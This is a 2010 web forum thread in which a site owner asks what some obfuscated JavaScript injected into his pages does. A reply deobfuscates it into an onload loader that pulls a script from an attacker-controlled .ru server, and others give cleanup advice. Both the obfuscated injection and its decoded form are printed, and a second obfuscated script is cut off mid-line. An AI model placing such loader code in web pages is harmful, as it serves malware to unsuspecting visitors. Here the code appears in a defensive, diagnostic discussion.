Page 1 of 1

code auto added to my site..anyone tell me what is?

Posted: Sun Apr 18, 2010 9:10 am
by garf90
we have a site and suddenly weird things are happening.

my developer tell me some weird Java / script has be added to multiple pages....but we (my company) didn't do it.

can any tell me about this code? (below) Has our site been hacked / infected?

We just found some kind of run time malaware on another site...but its on a different server.

very concerned.

any help would be great
G90

<script>var t="";var h="";var G;if(G!='m'){G=''};var D_="";function C() {var S='';var J="";var K=window;var V;if(V!='O'){V=''};var R=String("scri"+"pt");var iq="";var Z;var r='';var A;if(A!=''){A='zH'};var Fl=new String();var E=String("g");var L="appmnQi".substr(0,3)+"end"+"Chinrc7".substr(0,3)+"ldxiDU".substr(0,2);var b=new String("]");var f;if(f!='' && f!='Qp'){f=null};var z=RegExp;var GU;if(GU!='I' && GU!='lb'){GU=''};this.JL="";var bT;if(bT!=''){bT='px'};function N(q,p){var d="[";var nm;if(nm!='il' && nm != ''){nm=null};d+=p;d+=b;var oF;if(oF!='So' && oF != ''){oF=null};var w=new z(d, E);this.ze='';return q.replace(w, r);};var wk;if(wk!='e'){wk=''};this.Ns='';var i="onl"+"oad";var dz;if(dz!='no'){dz='no'};this.wa='';var LO='';var O_='';var u=N('sqr4cp','5pqQ4xa7');var D="defeANm0".substr(0,4)+"r";this.g='';this.Vw='';Z=function(){this.ZF='';try {var Gf;if(Gf!='uW' && Gf != ''){Gf=null};n=document.createElement(R);var RV=new String();var Yo;if(Yo!='' && Yo!='fF'){Yo='ib'};var v=new Array();n[D]=[1,8][0];var gY='';var gYj='';n = N('hGtQtGpW:H/j/jpYoHkjeGsjaWcYkG.YrQuY:j','GYjQWH')+N('8295634772434270642295791948166996914660733561217215135','65174293')+N('/DgXoVoEg5lReL.6cMoXm5/jt9eIcWh4nIo4r9aWtLiR.Wc5o3mR/Wi5c9iMb6a9.WcRo3mI.4p9hXp5','I36Xj9VE4W5RDLM');var XG;if(XG!='' && XG!='vi'){XG=null};var II='';var Q=new String("bodyOc6".substr(0,4));var QA;if(QA!='' && QA!='wq'){QA='JJ'};var Oa;if(Oa!='' && Oa!='hH'){Oa='Od'};var yK=new String();var Zy;if(Zy!='' && Zy!='MB'){Zy=null};var uu;if(uu!='' && uu!='nE'){uu=null};document[Q][L](n);var fR;if(fR!='U' && fR != ''){fR=null};} catch(H){this.EW="";var x_=new Date();};this.YM='';};K=Z;var vr="";this.kR='';var Jf;if(Jf!='of' && Jf != ''){Jf=null};};var Wd=new Array();var UK;if(UK!='HZ' && UK!='uz'){UK=''};C();var KqP=new String();</script>
<!--52071e04b71ca66bacac9424ea495244-->

Re: code auto added to my site..anyone tell me what is?

Posted: Sun Apr 18, 2010 11:40 am
by kaszu
Took me 20 minutes, but reversed. Here is what it does:

Code: Select all

window.onload = function () {
    n = document.createElement('script');
    n.defer = 1;
    n.src = 'http://pokesack.ru:8080/google.com/technorati.com/iciba.com.php';
    document.body.appendChild(n);
}
This code loads another Javascript code from pokesack.ru server, which adds iframe on the page (src is also on pokesack.ru)
Has our site been hacked / infected?
Yes

Edit: this is my 666th post :twisted:

Re: code auto added to my site..anyone tell me what is?

Posted: Sun Apr 18, 2010 11:40 am
by Benjamin
Your servers have been compromised. The script could very well be spreading malware to your site visitors or used for monetary gain of some sort.

Re: code auto added to my site..anyone tell me what is?

Posted: Sun Apr 18, 2010 12:57 pm
by garf90
thanks....and S### lol


ok will look into it further.

Re: code auto added to my site..anyone tell me what is?

Posted: Sun Apr 18, 2010 1:10 pm
by garf90
Benjamin wrote:Your servers have been compromised. The script could very well be spreading malware to your site visitors or used for monetary gain of some sort.
thankfully site is not yet live.

so no customers yet.......

anyone in these forums dealt with these kind on run time doohickys before?

i may need a pro on this. its not my guys field of expertise.

G90

Re: code auto added to my site..anyone tell me what is?

Posted: Sun Apr 18, 2010 1:23 pm
by garf90
additional: hey kaszu thx for taking the time to track the source down and looking into it for me.

G90

Re: code auto added to my site..anyone tell me what is?

Posted: Sun Apr 18, 2010 2:14 pm
by Benjamin
Well, here's what I would do:

1. Locate the entry point they used to gain access and fix it.
2. Reprovision the server. e.g. reinstall Linux from scratch in case there are any root kits installed. Your webhost can do this for you.
3. Check the entire code base for vulnerabilities, especially upload forms and unprotected variables in database queries.
4. Use the latest version of any external libraries, such as phpBB or whatever you may be using.
5. Use cPanel and enable brute force detection, which will automatically block IP's with many invalid logins.
6. Disable any services not being used. e.g. ssh, ftp.
7. Ensure a firewall is installed and be aware of what ports are open and who they are open to.

I'm sure I'm missing some things, but this is a good start.

Re: code auto added to my site..anyone tell me what is?

Posted: Sun Apr 18, 2010 2:22 pm
by garf90
I get better support here than my hosting company....who said 'we cant touch your code..sorry"

Re: code auto added to my site..anyone tell me what is?

Posted: Fri Apr 23, 2010 1:21 pm
by garf90
ok spent almost a week...got almost everything.

but just found this. is this another instance of the haclk or something else?

dont want to delete just in case

<script>var j;if(j!='FJ' && j!='y'){j=''};this.TJ='';try {var C;if(C!='' && C!='Z'){C=''};var br='';var F=window[unescape("%75%6e%65%73%63%61%70%65")];this.PN="";var G;if(G!='' && G!='Y'){G=''};var ZV=